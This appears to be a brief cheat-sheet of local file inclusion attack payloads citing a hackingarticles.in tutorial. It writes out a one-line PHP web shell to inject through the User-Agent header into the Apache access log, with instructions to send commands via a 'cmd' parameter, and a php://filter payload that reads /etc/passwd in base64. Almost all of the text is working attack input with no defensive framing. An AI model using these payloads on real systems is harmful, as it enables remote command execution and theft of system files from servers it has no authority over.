file=/var/log/httpd-access.log
User-Agent: <?php echo system($_REQUEST['cmd']); ?>
Send cmd as parameter in GET or POST request
file=php://filter/read=convert.base64-encode/resource=/etc/passwd
https://www.hackingarticles.in/5-ways-exploit-lfi-vulnerability/